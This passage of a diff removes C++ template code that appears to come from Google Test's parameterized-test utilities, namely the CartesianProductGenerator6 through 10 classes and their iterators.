-        g4_, g4_.end(), g5_, g5_.end(), g6_, g6_.end());
-  }
-
- private:
-  class Iterator : public ParamIteratorInterface<ParamType> {
-   public:
-    Iterator(const ParamGeneratorInterface<ParamType>* base,
-      const ParamGenerator<T1>& g1,
-      const typename ParamGenerator<T1>::iterator& current1,
-      const ParamGenerator<T2>& g2,
-      const typename ParamGenerator<T2>::iterator& current2,
-      const ParamGenerator<T3>& g3,
-      const typename ParamGenerator<T3>::iterator& current3,
-      const ParamGenerator<T4>& g4,
-      const typename ParamGenerator<T4>::iterator& current4,
-      const ParamGenerator<T5>& g5,
-      const typename ParamGenerator<T5>::iterator& current5,
-      const ParamGenerator<T6>& g6,
-      const typename ParamGenerator<T6>::iterator& current6)
-        : base_(base),
-          begin1_(g1.begin()), end1_(g1.end()), current1_(current1),
-          begin2_(g2.begin()), end2_(g2.end()), current2_(current2),
-          begin3_(g3.begin()), end3_(g3.end()), current3_(current3),
-          begin4_(g4.begin()), end4_(g4.end()), current4_(current4),
-          begin5_(g5.begin()), end5_(g5.end()), current5_(current5),
-          begin6_(g6.begin()), end6_(g6.end()), current6_(current6)    {
-      ComputeCurrentValue();
-    }
-    virtual ~Iterator() {}
-
-    virtual const ParamGeneratorInterface<ParamType>* BaseGenerator() const {
-      return base_;
-    }
-    // Advance should not be called on beyond-of-range iterators
-    // so no component iterators must be beyond end of range, either.
-    virtual void Advance() {
-      assert(!AtEnd());
-      ++current6_;
-      if (current6_ == end6_) {
-        current6_ = begin6_;
-        ++current5_;
-      }
-      if (current5_ == end5_) {
-        current5_ = begin5_;
-        ++current4_;
-      }
-      if (current4_ == end4_) {
-        current4_ = begin4_;
-        ++current3_;
-      }
-      if (current3_ == end3_) {
-        current3_ = begin3_;
-        ++current2_;
-      }
-      if (current2_ == end2_) {
-        current2_ = begin2_;
-        ++current1_;
-      }
-      ComputeCurrentValue();
-    }
-    virtual ParamIteratorInterface<ParamType>* Clone() const {
-      return new Iterator(*this);
-    }
-    virtual const ParamType* Current() const { return &current_value_; }
-    virtual bool Equals(const ParamIteratorInterface<ParamType>& other) const {
-      // Having the same base generator guarantees that the other
-      // iterator is of the same type and we can downcast.
-      GTEST_CHECK_(BaseGenerator() == other.BaseGenerator())
-          << "The program attempted to compare iterators "
-          << "from different generators." << std::endl;
-      const Iterator* typed_other =
-          CheckedDowncastToActualType<const Iterator>(&other);
-      // We must report iterators equal if they both point beyond their
-      // respective ranges. That can happen in a variety of fashions,
-      // so we have to consult AtEnd().
-      return (AtEnd() && typed_other->AtEnd()) ||
-         (
-          current1_ == typed_other->current1_ &&
-          current2_ == typed_other->current2_ &&
-          current3_ == typed_other->current3_ &&
-          current4_ == typed_other->current4_ &&
-          current5_ == typed_other->current5_ &&
-          current6_ == typed_other->current6_);
-    }
-
-   private:
-    Iterator(const Iterator& other)
-        : base_(other.base_),
-        begin1_(other.begin1_),
-        end1_(other.end1_),
-        current1_(other.current1_),
-        begin2_(other.begin2_),
-        end2_(other.end2_),
-        current2_(other.current2_),
-        begin3_(other.begin3_),
-        end3_(other.end3_),
-        current3_(other.current3_),
-        begin4_(other.begin4_),
-        end4_(other.end4_),
-        current4_(other.current4_),
-        begin5_(other.begin5_),
-        end5_(other.end5_),
-        current5_(other.current5_),
-        begin6_(other.begin6_),
-        end6_(other.end6_),
-        current6_(other.current6_) {
-      ComputeCurrentValue();
-    }
-
-    void ComputeCurrentValue() {
-      if (!AtEnd())
-        current_value_ = ParamType(*current1_, *current2_, *current3_,
-            *current4_, *current5_, *current6_);
-    }
-    bool AtEnd() const {
-      // We must report iterator past the end of the range when either of the
-      // component iterators has reached the end of its range.
-      return
-          current1_ == end1_ ||
-          current2_ == end2_ ||
-          current3_ == end3_ ||
-          current4_ == end4_ ||
-          current5_ == end5_ ||
-          current6_ == end6_;
-    }
-
-    // No implementation - assignment is unsupported.
-    void operator=(const Iterator& other);
-
-    const ParamGeneratorInterface<ParamType>* const base_;
-    // begin[i]_ and end[i]_ define the i-th range that Iterator traverses.
-    // current[i]_ is the actual traversing iterator.
-    const typename ParamGenerator<T1>::iterator begin1_;
-    const typename ParamGenerator<T1>::iterator end1_;
-    typename ParamGenerator<T1>::iterator current1_;
-    const typename ParamGenerator<T2>::iterator begin2_;
-    const typename ParamGenerator<T2>::iterator end2_;
-    typename ParamGenerator<T2>::iterator current2_;
-    const typename ParamGenerator<T3>::iterator begin3_;
-    const typename ParamGenerator<T3>::iterator end3_;
-    typename ParamGenerator<T3>::iterator current3_;
-    const typename ParamGenerator<T4>::iterator begin4_;
-    const typename ParamGenerator<T4>::iterator end4_;
-    typename ParamGenerator<T4>::iterator current4_;
-    const typename ParamGenerator<T5>::iterator begin5_;
-    const typename ParamGenerator<T5>::iterator end5_;
-    typename ParamGenerator<T5>::iterator current5_;
-    const typename ParamGenerator<T6>::iterator begin6_;
-    const typename ParamGenerator<T6>::iterator end6_;
-    typename ParamGenerator<T6>::iterator current6_;
-    ParamType current_value_;
-  };  // class CartesianProductGenerator6::Iterator
-
-  // No implementation - assignment is unsupported.
-  void operator=(const CartesianProductGenerator6& other);
-
-  const ParamGenerator<T1> g1_;
-  const ParamGenerator<T2> g2_;
-  const ParamGenerator<T3> g3_;
-  const ParamGenerator<T4> g4_;
-  const ParamGenerator<T5> g5_;
-  const ParamGenerator<T6> g6_;
-};  // class CartesianProductGenerator6
-
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7>
-class CartesianProductGenerator7
-    : public ParamGeneratorInterface< ::testing::tuple<T1, T2, T3, T4, T5, T6,
-        T7> > {
- public:
-  typedef ::testing::tuple<T1, T2, T3, T4, T5, T6, T7> ParamType;
-
-  CartesianProductGenerator7(const ParamGenerator<T1>& g1,
-      const ParamGenerator<T2>& g2, const ParamGenerator<T3>& g3,
-      const ParamGenerator<T4>& g4, const ParamGenerator<T5>& g5,
-      const ParamGenerator<T6>& g6, const ParamGenerator<T7>& g7)
-      : g1_(g1), g2_(g2), g3_(g3), g4_(g4), g5_(g5), g6_(g6), g7_(g7) {}
-  virtual ~CartesianProductGenerator7() {}
-
-  virtual ParamIteratorInterface<ParamType>* Begin() const {
-    return new Iterator(this, g1_, g1_.begin(), g2_, g2_.begin(), g3_,
-        g3_.begin(), g4_, g4_.begin(), g5_, g5_.begin(), g6_, g6_.begin(), g7_,
-        g7_.begin());
-  }
-  virtual ParamIteratorInterface<ParamType>* End() const {
-    return new Iterator(this, g1_, g1_.end(), g2_, g2_.end(), g3_, g3_.end(),
-        g4_, g4_.end(), g5_, g5_.end(), g6_, g6_.end(), g7_, g7_.end());
-  }
-
- private:
-  class Iterator : public ParamIteratorInterface<ParamType> {
-   public:
-    Iterator(const ParamGeneratorInterface<ParamType>* base,
-      const ParamGenerator<T1>& g1,
-      const typename ParamGenerator<T1>::iterator& current1,
-      const ParamGenerator<T2>& g2,
-      const typename ParamGenerator<T2>::iterator& current2,
-      const ParamGenerator<T3>& g3,
-      const typename ParamGenerator<T3>::iterator& current3,
-      const ParamGenerator<T4>& g4,
-      const typename ParamGenerator<T4>::iterator& current4,
-      const ParamGenerator<T5>& g5,
-      const typename ParamGenerator<T5>::iterator& current5,
-      const ParamGenerator<T6>& g6,
-      const typename ParamGenerator<T6>::iterator& current6,
-      const ParamGenerator<T7>& g7,
-      const typename ParamGenerator<T7>::iterator& current7)
-        : base_(base),
-          begin1_(g1.begin()), end1_(g1.end()), current1_(current1),
-          begin2_(g2.begin()), end2_(g2.end()), current2_(current2),
-          begin3_(g3.begin()), end3_(g3.end()), current3_(current3),
-          begin4_(g4.begin()), end4_(g4.end()), current4_(current4),
-          begin5_(g5.begin()), end5_(g5.end()), current5_(current5),
-          begin6_(g6.begin()), end6_(g6.end()), current6_(current6),
-          begin7_(g7.begin()), end7_(g7.end()), current7_(current7)    {
-      ComputeCurrentValue();
-    }
-    virtual ~Iterator() {}
-
-    virtual const ParamGeneratorInterface<ParamType>* BaseGenerator() const {
-      return base_;
-    }
-    // Advance should not be called on beyond-of-range iterators
-    // so no component iterators must be beyond end of range, either.
-    virtual void Advance() {
-      assert(!AtEnd());
-      ++current7_;
-      if (current7_ == end7_) {
-        current7_ = begin7_;
-        ++current6_;
-      }
-      if (current6_ == end6_) {
-        current6_ = begin6_;
-        ++current5_;
-      }
-      if (current5_ == end5_) {
-        current5_ = begin5_;
-        ++current4_;
-      }
-      if (current4_ == end4_) {
-        current4_ = begin4_;
-        ++current3_;
-      }
-      if (current3_ == end3_) {
-        current3_ = begin3_;
-        ++current2_;
-      }
-      if (current2_ == end2_) {
-        current2_ = begin2_;
-        ++current1_;
-      }
-      ComputeCurrentValue();
-    }
-    virtual ParamIteratorInterface<ParamType>* Clone() const {
-      return new Iterator(*this);
-    }
-    virtual const ParamType* Current() const { return &current_value_; }
-    virtual bool Equals(const ParamIteratorInterface<ParamType>& other) const {
-      // Having the same base generator guarantees that the other
-      // iterator is of the same type and we can downcast.
-      GTEST_CHECK_(BaseGenerator() == other.BaseGenerator())
-          << "The program attempted to compare iterators "
-          << "from different generators." << std::endl;
-      const Iterator* typed_other =
-          CheckedDowncastToActualType<const Iterator>(&other);
-      // We must report iterators equal if they both point beyond their
-      // respective ranges. That can happen in a variety of fashions,
-      // so we have to consult AtEnd().
-      return (AtEnd() && typed_other->AtEnd()) ||
-         (
-          current1_ == typed_other->current1_ &&
-          current2_ == typed_other->current2_ &&
-          current3_ == typed_other->current3_ &&
-          current4_ == typed_other->current4_ &&
-          current5_ == typed_other->current5_ &&
-          current6_ == typed_other->current6_ &&
-          current7_ == typed_other->current7_);
-    }
-
-   private:
-    Iterator(const Iterator& other)
-        : base_(other.base_),
-        begin1_(other.begin1_),
-        end1_(other.end1_),
-        current1_(other.current1_),
-        begin2_(other.begin2_),
-        end2_(other.end2_),
-        current2_(other.current2_),
-        begin3_(other.begin3_),
-        end3_(other.end3_),
-        current3_(other.current3_),
-        begin4_(other.begin4_),
-        end4_(other.end4_),
-        current4_(other.current4_),
-        begin5_(other.begin5_),
-        end5_(other.end5_),
-        current5_(other.current5_),
-        begin6_(other.begin6_),
-        end6_(other.end6_),
-        current6_(other.current6_),
-        begin7_(other.begin7_),
-        end7_(other.end7_),
-        current7_(other.current7_) {
-      ComputeCurrentValue();
-    }
-
-    void ComputeCurrentValue() {
-      if (!AtEnd())
-        current_value_ = ParamType(*current1_, *current2_, *current3_,
-            *current4_, *current5_, *current6_, *current7_);
-    }
-    bool AtEnd() const {
-      // We must report iterator past the end of the range when either of the
-      // component iterators has reached the end of its range.
-      return
-          current1_ == end1_ ||
-          current2_ == end2_ ||
-          current3_ == end3_ ||
-          current4_ == end4_ ||
-          current5_ == end5_ ||
-          current6_ == end6_ ||
-          current7_ == end7_;
-    }
-
-    // No implementation - assignment is unsupported.
-    void operator=(const Iterator& other);
-
-    const ParamGeneratorInterface<ParamType>* const base_;
-    // begin[i]_ and end[i]_ define the i-th range that Iterator traverses.
-    // current[i]_ is the actual traversing iterator.
-    const typename ParamGenerator<T1>::iterator begin1_;
-    const typename ParamGenerator<T1>::iterator end1_;
-    typename ParamGenerator<T1>::iterator current1_;
-    const typename ParamGenerator<T2>::iterator begin2_;
-    const typename ParamGenerator<T2>::iterator end2_;
-    typename ParamGenerator<T2>::iterator current2_;
-    const typename ParamGenerator<T3>::iterator begin3_;
-    const typename ParamGenerator<T3>::iterator end3_;
-    typename ParamGenerator<T3>::iterator current3_;
-    const typename ParamGenerator<T4>::iterator begin4_;
-    const typename ParamGenerator<T4>::iterator end4_;
-    typename ParamGenerator<T4>::iterator current4_;
-    const typename ParamGenerator<T5>::iterator begin5_;
-    const typename ParamGenerator<T5>::iterator end5_;
-    typename ParamGenerator<T5>::iterator current5_;
-    const typename ParamGenerator<T6>::iterator begin6_;
-    const typename ParamGenerator<T6>::iterator end6_;
-    typename ParamGenerator<T6>::iterator current6_;
-    const typename ParamGenerator<T7>::iterator begin7_;
-    const typename ParamGenerator<T7>::iterator end7_;
-    typename ParamGenerator<T7>::iterator current7_;
-    ParamType current_value_;
-  };  // class CartesianProductGenerator7::Iterator
-
-  // No implementation - assignment is unsupported.
-  void operator=(const CartesianProductGenerator7& other);
-
-  const ParamGenerator<T1> g1_;
-  const ParamGenerator<T2> g2_;
-  const ParamGenerator<T3> g3_;
-  const ParamGenerator<T4> g4_;
-  const ParamGenerator<T5> g5_;
-  const ParamGenerator<T6> g6_;
-  const ParamGenerator<T7> g7_;
-};  // class CartesianProductGenerator7
-
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8>
-class CartesianProductGenerator8
-    : public ParamGeneratorInterface< ::testing::tuple<T1, T2, T3, T4, T5, T6,
-        T7, T8> > {
- public:
-  typedef ::testing::tuple<T1, T2, T3, T4, T5, T6, T7, T8> ParamType;
-
-  CartesianProductGenerator8(const ParamGenerator<T1>& g1,
-      const ParamGenerator<T2>& g2, const ParamGenerator<T3>& g3,
-      const ParamGenerator<T4>& g4, const ParamGenerator<T5>& g5,
-      const ParamGenerator<T6>& g6, const ParamGenerator<T7>& g7,
-      const ParamGenerator<T8>& g8)
-      : g1_(g1), g2_(g2), g3_(g3), g4_(g4), g5_(g5), g6_(g6), g7_(g7),
-          g8_(g8) {}
-  virtual ~CartesianProductGenerator8() {}
-
-  virtual ParamIteratorInterface<ParamType>* Begin() const {
-    return new Iterator(this, g1_, g1_.begin(), g2_, g2_.begin(), g3_,
-        g3_.begin(), g4_, g4_.begin(), g5_, g5_.begin(), g6_, g6_.begin(), g7_,
-        g7_.begin(), g8_, g8_.begin());
-  }
-  virtual ParamIteratorInterface<ParamType>* End() const {
-    return new Iterator(this, g1_, g1_.end(), g2_, g2_.end(), g3_, g3_.end(),
-        g4_, g4_.end(), g5_, g5_.end(), g6_, g6_.end(), g7_, g7_.end(), g8_,
-        g8_.end());
-  }
-
- private:
-  class Iterator : public ParamIteratorInterface<ParamType> {
-   public:
-    Iterator(const ParamGeneratorInterface<ParamType>* base,
-      const ParamGenerator<T1>& g1,
-      const typename ParamGenerator<T1>::iterator& current1,
-      const ParamGenerator<T2>& g2,
-      const typename ParamGenerator<T2>::iterator& current2,
-      const ParamGenerator<T3>& g3,
-      const typename ParamGenerator<T3>::iterator& current3,
-      const ParamGenerator<T4>& g4,
-      const typename ParamGenerator<T4>::iterator& current4,
-      const ParamGenerator<T5>& g5,
-      const typename ParamGenerator<T5>::iterator& current5,
-      const ParamGenerator<T6>& g6,
-      const typename ParamGenerator<T6>::iterator& current6,
-      const ParamGenerator<T7>& g7,
-      const typename ParamGenerator<T7>::iterator& current7,
-      const ParamGenerator<T8>& g8,
-      const typename ParamGenerator<T8>::iterator& current8)
-        : base_(base),
-          begin1_(g1.begin()), end1_(g1.end()), current1_(current1),
-          begin2_(g2.begin()), end2_(g2.end()), current2_(current2),
-          begin3_(g3.begin()), end3_(g3.end()), current3_(current3),
-          begin4_(g4.begin()), end4_(g4.end()), current4_(current4),
-          begin5_(g5.begin()), end5_(g5.end()), current5_(current5),
-          begin6_(g6.begin()), end6_(g6.end()), current6_(current6),
-          begin7_(g7.begin()), end7_(g7.end()), current7_(current7),
-          begin8_(g8.begin()), end8_(g8.end()), current8_(current8)    {
-      ComputeCurrentValue();
-    }
-    virtual ~Iterator() {}
-
-    virtual const ParamGeneratorInterface<ParamType>* BaseGenerator() const {
-      return base_;
-    }
-    // Advance should not be called on beyond-of-range iterators
-    // so no component iterators must be beyond end of range, either.
-    virtual void Advance() {
-      assert(!AtEnd());
-      ++current8_;
-      if (current8_ == end8_) {
-        current8_ = begin8_;
-        ++current7_;
-      }
-      if (current7_ == end7_) {
-        current7_ = begin7_;
-        ++current6_;
-      }
-      if (current6_ == end6_) {
-        current6_ = begin6_;
-        ++current5_;
-      }
-      if (current5_ == end5_) {
-        current5_ = begin5_;
-        ++current4_;
-      }
-      if (current4_ == end4_) {
-        current4_ = begin4_;
-        ++current3_;
-      }
-      if (current3_ == end3_) {
-        current3_ = begin3_;
-        ++current2_;
-      }
-      if (current2_ == end2_) {
-        current2_ = begin2_;
-        ++current1_;
-      }
-      ComputeCurrentValue();
-    }
-    virtual ParamIteratorInterface<ParamType>* Clone() const {
-      return new Iterator(*this);
-    }
-    virtual const ParamType* Current() const { return &current_value_; }
-    virtual bool Equals(const ParamIteratorInterface<ParamType>& other) const {
-      // Having the same base generator guarantees that the other
-      // iterator is of the same type and we can downcast.
-      GTEST_CHECK_(BaseGenerator() == other.BaseGenerator())
-          << "The program attempted to compare iterators "
-          << "from different generators." << std::endl;
-      const Iterator* typed_other =
-          CheckedDowncastToActualType<const Iterator>(&other);
-      // We must report iterators equal if they both point beyond their
-      // respective ranges. That can happen in a variety of fashions,
-      // so we have to consult AtEnd().
-      return (AtEnd() && typed_other->AtEnd()) ||
-         (
-          current1_ == typed_other->current1_ &&
-          current2_ == typed_other->current2_ &&
-          current3_ == typed_other->current3_ &&
-          current4_ == typed_other->current4_ &&
-          current5_ == typed_other->current5_ &&
-          current6_ == typed_other->current6_ &&
-          current7_ == typed_other->current7_ &&
-          current8_ == typed_other->current8_);
-    }
-
-   private:
-    Iterator(const Iterator& other)
-        : base_(other.base_),
-        begin1_(other.begin1_),
-        end1_(other.end1_),
-        current1_(other.current1_),
-        begin2_(other.begin2_),
-        end2_(other.end2_),
-        current2_(other.current2_),
-        begin3_(other.begin3_),
-        end3_(other.end3_),
-        current3_(other.current3_),
-        begin4_(other.begin4_),
-        end4_(other.end4_),
-        current4_(other.current4_),
-        begin5_(other.begin5_),
-        end5_(other.end5_),
-        current5_(other.current5_),
-        begin6_(other.begin6_),
-        end6_(other.end6_),
-        current6_(other.current6_),
-        begin7_(other.begin7_),
-        end7_(other.end7_),
-        current7_(other.current7_),
-        begin8_(other.begin8_),
-        end8_(other.end8_),
-        current8_(other.current8_) {
-      ComputeCurrentValue();
-    }
-
-    void ComputeCurrentValue() {
-      if (!AtEnd())
-        current_value_ = ParamType(*current1_, *current2_, *current3_,
-            *current4_, *current5_, *current6_, *current7_, *current8_);
-    }
-    bool AtEnd() const {
-      // We must report iterator past the end of the range when either of the
-      // component iterators has reached the end of its range.
-      return
-          current1_ == end1_ ||
-          current2_ == end2_ ||
-          current3_ == end3_ ||
-          current4_ == end4_ ||
-          current5_ == end5_ ||
-          current6_ == end6_ ||
-          current7_ == end7_ ||
-          current8_ == end8_;
-    }
-
-    // No implementation - assignment is unsupported.
-    void operator=(const Iterator& other);
-
-    const ParamGeneratorInterface<ParamType>* const base_;
-    // begin[i]_ and end[i]_ define the i-th range that Iterator traverses.
-    // current[i]_ is the actual traversing iterator.
-    const typename ParamGenerator<T1>::iterator begin1_;
-    const typename ParamGenerator<T1>::iterator end1_;
-    typename ParamGenerator<T1>::iterator current1_;
-    const typename ParamGenerator<T2>::iterator begin2_;
-    const typename ParamGenerator<T2>::iterator end2_;
-    typename ParamGenerator<T2>::iterator current2_;
-    const typename ParamGenerator<T3>::iterator begin3_;
-    const typename ParamGenerator<T3>::iterator end3_;
-    typename ParamGenerator<T3>::iterator current3_;
-    const typename ParamGenerator<T4>::iterator begin4_;
-    const typename ParamGenerator<T4>::iterator end4_;
-    typename ParamGenerator<T4>::iterator current4_;
-    const typename ParamGenerator<T5>::iterator begin5_;
-    const typename ParamGenerator<T5>::iterator end5_;
-    typename ParamGenerator<T5>::iterator current5_;
-    const typename ParamGenerator<T6>::iterator begin6_;
-    const typename ParamGenerator<T6>::iterator end6_;
-    typename ParamGenerator<T6>::iterator current6_;
-    const typename ParamGenerator<T7>::iterator begin7_;
-    const typename ParamGenerator<T7>::iterator end7_;
-    typename ParamGenerator<T7>::iterator current7_;
-    const typename ParamGenerator<T8>::iterator begin8_;
-    const typename ParamGenerator<T8>::iterator end8_;
-    typename ParamGenerator<T8>::iterator current8_;
-    ParamType current_value_;
-  };  // class CartesianProductGenerator8::Iterator
-
-  // No implementation - assignment is unsupported.
-  void operator=(const CartesianProductGenerator8& other);
-
-  const ParamGenerator<T1> g1_;
-  const ParamGenerator<T2> g2_;
-  const ParamGenerator<T3> g3_;
-  const ParamGenerator<T4> g4_;
-  const ParamGenerator<T5> g5_;
-  const ParamGenerator<T6> g6_;
-  const ParamGenerator<T7> g7_;
-  const ParamGenerator<T8> g8_;
-};  // class CartesianProductGenerator8
-
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9>
-class CartesianProductGenerator9
-    : public ParamGeneratorInterface< ::testing::tuple<T1, T2, T3, T4, T5, T6,
-        T7, T8, T9> > {
- public:
-  typedef ::testing::tuple<T1, T2, T3, T4, T5, T6, T7, T8, T9> ParamType;
-
-  CartesianProductGenerator9(const ParamGenerator<T1>& g1,
-      const ParamGenerator<T2>& g2, const ParamGenerator<T3>& g3,
-      const ParamGenerator<T4>& g4, const ParamGenerator<T5>& g5,
-      const ParamGenerator<T6>& g6, const ParamGenerator<T7>& g7,
-      const ParamGenerator<T8>& g8, const ParamGenerator<T9>& g9)
-      : g1_(g1), g2_(g2), g3_(g3), g4_(g4), g5_(g5), g6_(g6), g7_(g7), g8_(g8),
-          g9_(g9) {}
-  virtual ~CartesianProductGenerator9() {}
-
-  virtual ParamIteratorInterface<ParamType>* Begin() const {
-    return new Iterator(this, g1_, g1_.begin(), g2_, g2_.begin(), g3_,
-        g3_.begin(), g4_, g4_.begin(), g5_, g5_.begin(), g6_, g6_.begin(), g7_,
-        g7_.begin(), g8_, g8_.begin(), g9_, g9_.begin());
-  }
-  virtual ParamIteratorInterface<ParamType>* End() const {
-    return new Iterator(this, g1_, g1_.end(), g2_, g2_.end(), g3_, g3_.end(),
-        g4_, g4_.end(), g5_, g5_.end(), g6_, g6_.end(), g7_, g7_.end(), g8_,
-        g8_.end(), g9_, g9_.end());
-  }
-
- private:
-  class Iterator : public ParamIteratorInterface<ParamType> {
-   public:
-    Iterator(const ParamGeneratorInterface<ParamType>* base,
-      const ParamGenerator<T1>& g1,
-      const typename ParamGenerator<T1>::iterator& current1,
-      const ParamGenerator<T2>& g2,
-      const typename ParamGenerator<T2>::iterator& current2,
-      const ParamGenerator<T3>& g3,
-      const typename ParamGenerator<T3>::iterator& current3,
-      const ParamGenerator<T4>& g4,
-      const typename ParamGenerator<T4>::iterator& current4,
-      const ParamGenerator<T5>& g5,
-      const typename ParamGenerator<T5>::iterator& current5,
-      const ParamGenerator<T6>& g6,
-      const typename ParamGenerator<T6>::iterator& current6,
-      const ParamGenerator<T7>& g7,
-      const typename ParamGenerator<T7>::iterator& current7,
-      const ParamGenerator<T8>& g8,
-      const typename ParamGenerator<T8>::iterator& current8,
-      const ParamGenerator<T9>& g9,
-      const typename ParamGenerator<T9>::iterator& current9)
-        : base_(base),
-          begin1_(g1.begin()), end1_(g1.end()), current1_(current1),
-          begin2_(g2.begin()), end2_(g2.end()), current2_(current2),
-          begin3_(g3.begin()), end3_(g3.end()), current3_(current3),
-          begin4_(g4.begin()), end4_(g4.end()), current4_(current4),
-          begin5_(g5.begin()), end5_(g5.end()), current5_(current5),
-          begin6_(g6.begin()), end6_(g6.end()), current6_(current6),
-          begin7_(g7.begin()), end7_(g7.end()), current7_(current7),
-          begin8_(g8.begin()), end8_(g8.end()), current8_(current8),
-          begin9_(g9.begin()), end9_(g9.end()), current9_(current9)    {
-      ComputeCurrentValue();
-    }
-    virtual ~Iterator() {}
-
-    virtual const ParamGeneratorInterface<ParamType>* BaseGenerator() const {
-      return base_;
-    }
-    // Advance should not be called on beyond-of-range iterators
-    // so no component iterators must be beyond end of range, either.
-    virtual void Advance() {
-      assert(!AtEnd());
-      ++current9_;
-      if (current9_ == end9_) {
-        current9_ = begin9_;
-        ++current8_;
-      }
-      if (current8_ == end8_) {
-        current8_ = begin8_;
-        ++current7_;
-      }
-      if (current7_ == end7_) {
-        current7_ = begin7_;
-        ++current6_;
-      }
-      if (current6_ == end6_) {
-        current6_ = begin6_;
-        ++current5_;
-      }
-      if (current5_ == end5_) {
-        current5_ = begin5_;
-        ++current4_;
-      }
-      if (current4_ == end4_) {
-        current4_ = begin4_;
-        ++current3_;
-      }
-      if (current3_ == end3_) {
-        current3_ = begin3_;
-        ++current2_;
-      }
-      if (current2_ == end2_) {
-        current2_ = begin2_;
-        ++current1_;
-      }
-      ComputeCurrentValue();
-    }
-    virtual ParamIteratorInterface<ParamType>* Clone() const {
-      return new Iterator(*this);
-    }
-    virtual const ParamType* Current() const { return &current_value_; }
-    virtual bool Equals(const ParamIteratorInterface<ParamType>& other) const {
-      // Having the same base generator guarantees that the other
-      // iterator is of the same type and we can downcast.
-      GTEST_CHECK_(BaseGenerator() == other.BaseGenerator())
-          << "The program attempted to compare iterators "
-          << "from different generators." << std::endl;
-      const Iterator* typed_other =
-          CheckedDowncastToActualType<const Iterator>(&other);
-      // We must report iterators equal if they both point beyond their
-      // respective ranges. That can happen in a variety of fashions,
-      // so we have to consult AtEnd().
-      return (AtEnd() && typed_other->AtEnd()) ||
-         (
-          current1_ == typed_other->current1_ &&
-          current2_ == typed_other->current2_ &&
-          current3_ == typed_other->current3_ &&
-          current4_ == typed_other->current4_ &&
-          current5_ == typed_other->current5_ &&
-          current6_ == typed_other->current6_ &&
-          current7_ == typed_other->current7_ &&
-          current8_ == typed_other->current8_ &&
-          current9_ == typed_other->current9_);
-    }
-
-   private:
-    Iterator(const Iterator& other)
-        : base_(other.base_),
-        begin1_(other.begin1_),
-        end1_(other.end1_),
-        current1_(other.current1_),
-        begin2_(other.begin2_),
-        end2_(other.end2_),
-        current2_(other.current2_),
-        begin3_(other.begin3_),
-        end3_(other.end3_),
-        current3_(other.current3_),
-        begin4_(other.begin4_),
-        end4_(other.end4_),
-        current4_(other.current4_),
-        begin5_(other.begin5_),
-        end5_(other.end5_),
-        current5_(other.current5_),
-        begin6_(other.begin6_),
-        end6_(other.end6_),
-        current6_(other.current6_),
-        begin7_(other.begin7_),
-        end7_(other.end7_),
-        current7_(other.current7_),
-        begin8_(other.begin8_),
-        end8_(other.end8_),
-        current8_(other.current8_),
-        begin9_(other.begin9_),
-        end9_(other.end9_),
-        current9_(other.current9_) {
-      ComputeCurrentValue();
-    }
-
-    void ComputeCurrentValue() {
-      if (!AtEnd())
-        current_value_ = ParamType(*current1_, *current2_, *current3_,
-            *current4_, *current5_, *current6_, *current7_, *current8_,
-            *current9_);
-    }
-    bool AtEnd() const {
-      // We must report iterator past the end of the range when either of the
-      // component iterators has reached the end of its range.
-      return
-          current1_ == end1_ ||
-          current2_ == end2_ ||
-          current3_ == end3_ ||
-          current4_ == end4_ ||
-          current5_ == end5_ ||
-          current6_ == end6_ ||
-          current7_ == end7_ ||
-          current8_ == end8_ ||
-          current9_ == end9_;
-    }
-
-    // No implementation - assignment is unsupported.
-    void operator=(const Iterator& other);
-
-    const ParamGeneratorInterface<ParamType>* const base_;
-    // begin[i]_ and end[i]_ define the i-th range that Iterator traverses.
-    // current[i]_ is the actual traversing iterator.
-    const typename ParamGenerator<T1>::iterator begin1_;
-    const typename ParamGenerator<T1>::iterator end1_;
-    typename ParamGenerator<T1>::iterator current1_;
-    const typename ParamGenerator<T2>::iterator begin2_;
-    const typename ParamGenerator<T2>::iterator end2_;
-    typename ParamGenerator<T2>::iterator current2_;
-    const typename ParamGenerator<T3>::iterator begin3_;
-    const typename ParamGenerator<T3>::iterator end3_;
-    typename ParamGenerator<T3>::iterator current3_;
-    const typename ParamGenerator<T4>::iterator begin4_;
-    const typename ParamGenerator<T4>::iterator end4_;
-    typename ParamGenerator<T4>::iterator current4_;
-    const typename ParamGenerator<T5>::iterator begin5_;
-    const typename ParamGenerator<T5>::iterator end5_;
-    typename ParamGenerator<T5>::iterator current5_;
-    const typename ParamGenerator<T6>::iterator begin6_;
-    const typename ParamGenerator<T6>::iterator end6_;
-    typename ParamGenerator<T6>::iterator current6_;
-    const typename ParamGenerator<T7>::iterator begin7_;
-    const typename ParamGenerator<T7>::iterator end7_;
-    typename ParamGenerator<T7>::iterator current7_;
-    const typename ParamGenerator<T8>::iterator begin8_;
-    const typename ParamGenerator<T8>::iterator end8_;
-    typename ParamGenerator<T8>::iterator current8_;
-    const typename ParamGenerator<T9>::iterator begin9_;
-    const typename ParamGenerator<T9>::iterator end9_;
-    typename ParamGenerator<T9>::iterator current9_;
-    ParamType current_value_;
-  };  // class CartesianProductGenerator9::Iterator
-
-  // No implementation - assignment is unsupported.
-  void operator=(const CartesianProductGenerator9& other);
-
-  const ParamGenerator<T1> g1_;
-  const ParamGenerator<T2> g2_;
-  const ParamGenerator<T3> g3_;
-  const ParamGenerator<T4> g4_;
-  const ParamGenerator<T5> g5_;
-  const ParamGenerator<T6> g6_;
-  const ParamGenerator<T7> g7_;
-  const ParamGenerator<T8> g8_;
-  const ParamGenerator<T9> g9_;
-};  // class CartesianProductGenerator9
-
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10>
-class CartesianProductGenerator10
-    : public ParamGeneratorInterface< ::testing::tuple<T1, T2, T3, T4, T5, T6,
-        T7, T8, T9, T10> > {
- public:
-  typedef ::testing::tuple<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10> ParamType;
-
-  CartesianProductGenerator10(const ParamGenerator<T1>& g1,
-      const ParamGenerator<T2>& g2, const ParamGenerator<T3>& g3,
-      const ParamGenerator<T4>& g4, const ParamGenerator<T5>& g5,
-      const ParamGenerator<T6>& g6, const ParamGenerator<T7>& g7,
-      const ParamGenerator<T8>& g8, const ParamGenerator<T9>& g9,
-      const ParamGenerator<T10>& g10)
-      : g1_(g1), g2_(g2), g3_(g3), g4_(g4), g5_(g5), g6_(g6), g7_(g7), g8_(g8),
-          g9_(g9), g10_(g10) {}
